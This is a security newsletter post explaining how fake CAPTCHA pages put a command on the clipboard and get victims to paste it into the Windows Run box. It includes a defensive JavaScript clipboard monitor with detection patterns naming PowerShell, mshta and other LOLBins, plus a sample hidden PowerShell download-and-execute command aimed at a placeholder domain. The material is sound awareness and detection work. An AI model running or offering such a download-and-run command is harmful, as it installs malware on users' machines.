🤖Fake CAPTCHAs are dropping malware🔒

Why you must always be alert, even when solving stupid CAPTCHAs

You know those annoying puzzles that pop up every now and then when you try to visit a website, or register for something?

The ones that ask you to click on a fire hydrant, or a bus, on a series of photos?

Yeah, those puzzles.

It turns out, crooks are using them to trick you into downloading malware. 

It makes sense:

  • They’re annoying

  • They’re everywhere

  • We’re so used to them we don’t even think about them while we’re clicking away

That’s the perfect mindset to be exploited - with our guards down.

Here’s how they’re doing it, and what to pay attention to:

Not everything is a CAPTCHA

CAPTCHA is short for Completely Automated Public Turing test to tell Computers and Humans Apart. The name is pretty self-explanatory: it works as a gatekeeper that lets humans through to certain pages while keeping automated bots out, which makes it a good way to stop your website from being abused (spam sign-ups, scraping, password-guessing and the like). 

However, with AI coming into play over the last few years, many of the “old-fashioned” CAPTCHAs (like the one in the meme above) started losing their effectiveness: a bot can now read the squiggly text about as well as you can. So, tech firms got creative. 

Therefore, we now have: 

… and many others

As a result, it’s hard to tell a legitimate CAPTCHA apart from a scam designed to drop malware. Here’s what crooks came up with:

They first create a fake website where you need to land. That website can be anything: free movies and TV series, free software, iPhone giveaways, incredible coupons. The site also carries a small piece of malicious JavaScript that silently writes a command to your clipboard, usually at the moment you click the fake “I’m not a robot” checkbox (some browsers only let a page write to the clipboard right after you click or type on it, so that click is what makes the trick work). 

The clipboard is the place where your computer holds whatever you last “copied”, until you “paste” it somewhere.

In other words, by simply visiting a website and clicking a checkbox, you “copied” a command you never saw. All the crooks need to do is get you to paste it into your computer.

That’s where the fake CAPTCHA comes in. The site shows an overlay saying you need to “verify” you’re human, with step-by-step instructions. First, it asks you to press the Windows key + R (this opens the Run box. It’s a legitimate Windows program, you can give it a try: whatever you type in there is executed with your user account’s rights).

Then, it asks you to press CTRL + V (the “paste” command - this pastes the hidden command into the Run box) and hit Enter.

If you do that, voila - you just told your computer to run malware. The pasted text is typically a one-line PowerShell (or mshta) command that quietly downloads and runs the real payload, and it often has a harmless-looking comment such as “I am not a robot” tacked on the end, so the bit you might glimpse in the Run box doesn’t alarm you.
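Here is what that trick looks like from the browser’s side, as an added example (this is not the newsletter’s own code, nor code from any real campaign). It has two parts: a small monitor you can paste into your browser’s DevTools console on a page you don’t trust, which logs every attempt the page makes to write to your clipboard, and a rough heuristic that flags clipboard text shaped like a Windows Run-box “download and run” command. All function names, the regex patterns and the two sample strings are my own illustrative choices; the “bad” sample points at a reserved .invalid domain so it cannot resolve.

```javascript
// Added example, not code from the newsletter or from any real campaign.
// (1) installClipboardMonitor: logs the page's clipboard writes.
// (2) looksLikeRunBoxCommand: heuristic for "paste me into Win + R" text.
// Names, patterns and samples are illustrative assumptions.

// Interpreters and Windows LOLBins a Run-box command would typically start with.
// The optional group tolerates a full path such as C:\Windows\System32\cmd.exe.
const LAUNCHER = /^\s*(?:"?[A-Za-z]:\\[^"]*\\)?(powershell|pwsh|mshta|cmd|wscript|cscript|certutil|bitsadmin|rundll32|regsvr32|curl)(\.exe)?\b/i;

// Signals that the text fetches and executes something, rather than just being a link.
const EXEC_SIGNALS = [
  /\biex\b/i, /invoke-expression/i, /downloadstring/i,
  /\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b/i,
  /-enc(odedcommand)?\b/i, /-w(indowstyle)?\s+hidden/i,
];
const URL_PATTERN = /https?:\/\/\S+/i;

// Returns { suspicious, reasons }. A lone URL is normal (sites copy share links
// all the time); a launcher, or an exec signal combined with a URL, is not.
function looksLikeRunBoxCommand(text) {
  if (typeof text !== 'string') return { suspicious: false, reasons: [] };
  const reasons = [];
  const hasLauncher = LAUNCHER.test(text);
  if (hasLauncher) reasons.push('starts with a command interpreter or LOLBin');
  const execHits = EXEC_SIGNALS.filter((re) => re.test(text));
  for (const re of execHits) reasons.push(`execution signal ${re}`);
  const hasUrl = URL_PATTERN.test(text);
  if (hasUrl) reasons.push('contains a URL');
  return { suspicious: hasLauncher || (execHits.length > 0 && hasUrl), reasons };
}

// Wraps the two common ways a page writes to the clipboard. `win` is the window
// to instrument (pass a fake one for offline testing); onWrite(source, text) is
// called before the real write goes through. Caveat: a page can also set the
// clipboard from inside a "copy" event handler via clipboardData.setData, which
// this hook does not see, so grep the page's scripts for "setData" as well.
function installClipboardMonitor(win, onWrite) {
  const clip = win.navigator && win.navigator.clipboard;
  if (clip && typeof clip.writeText === 'function') {
    const realWriteText = clip.writeText.bind(clip);
    clip.writeText = (text) => {
      onWrite('navigator.clipboard.writeText', text);
      return realWriteText(text);
    };
  }
  const doc = win.document;
  if (doc && typeof doc.execCommand === 'function') {
    const realExec = doc.execCommand.bind(doc);
    doc.execCommand = (cmd, ...rest) => {
      if (String(cmd).toLowerCase() === 'copy') {
        const selected = typeof win.getSelection === 'function' ? String(win.getSelection()) : '';
        onWrite('document.execCommand("copy")', selected);
      }
      return realExec(cmd, ...rest);
    };
  }
}

// Constructed samples. SAMPLE_BAD is shaped like the pasted command described in
// the article but uses a reserved .invalid domain, so it is inert.
const SAMPLE_BAD = 'powershell -w hidden -c "iex (irm https://example.invalid/v)" # I am not a robot';
const SAMPLE_OK = 'https://example.com/help/captcha-not-loading';

// Offline walkthrough: a fake window stands in for the browser, and a fake
// "I'm not a robot" click handler does what the malicious page does.
function demo() {
  const seen = [];
  const fakeWin = {
    navigator: { clipboard: { writeText: async (t) => t } },
    document: { execCommand: () => true },
    getSelection: () => SAMPLE_OK,
  };
  installClipboardMonitor(fakeWin, (source, text) =>
    seen.push({ source, text, ...looksLikeRunBoxCommand(text) }));
  const onFakeCheckboxClick = () => fakeWin.navigator.clipboard.writeText(SAMPLE_BAD);
  onFakeCheckboxClick();                  // the "verification" click
  fakeWin.document.execCommand('copy');   // a benign share-link copy, for comparison
  return seen;
}

if (typeof window !== 'undefined') {
  // Real browser: paste this into the DevTools console, then click around the page.
  installClipboardMonitor(window, (source, text) =>
    console.warn(`[clipboard] ${source}:`, text, looksLikeRunBoxCommand(text)));
} else {
  console.table(demo());
}
```

The useful signal is not the heuristic but the write itself: a genuine CAPTCHA never needs to put anything on your clipboard, so any write the monitor logs while you are “verifying” is a red flag on its own. The pattern list is deliberately short and will miss variants; treat it as a hint, not a verdict.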

People are falling for it

If it feels like a blatantly obvious attempt at a scam - that’s because IT IS. 

But people are still falling for it. Just look at Reddit:

This is just another example proving my point: 

Whatever you do online, you must always be vigilant. 

If you ever come across a weird-looking CAPTCHA and you’re not sure if it’s legit or not, here’s a quick rule of thumb:

  • If it asks you to do anything outside your browser (press Windows + R, open a terminal, run a command) - it’s a scam

  • If it asks you to download anything - it’s a scam

  • If it redirects you to an unknown or unexpected website - it’s a scam

  • If it asks you to provide any sort of personal data (name, email, password, card details) - it’s a scam

A real CAPTCHA is a small puzzle or a checkbox that you complete inside the browser window, and that’s it. It never needs your keyboard shortcuts, your clipboard or a download. 

That’s it from me this week. I wish you all happy holidays, and take it easy on the sweets 🙂

  • Sead from SmallBiz CyberWiz

P.S.

If you enjoyed this newsletter and appreciate these tips, please share this newsletter with your friends and colleagues, it would help a lot!

Header image credit: LFGDating.com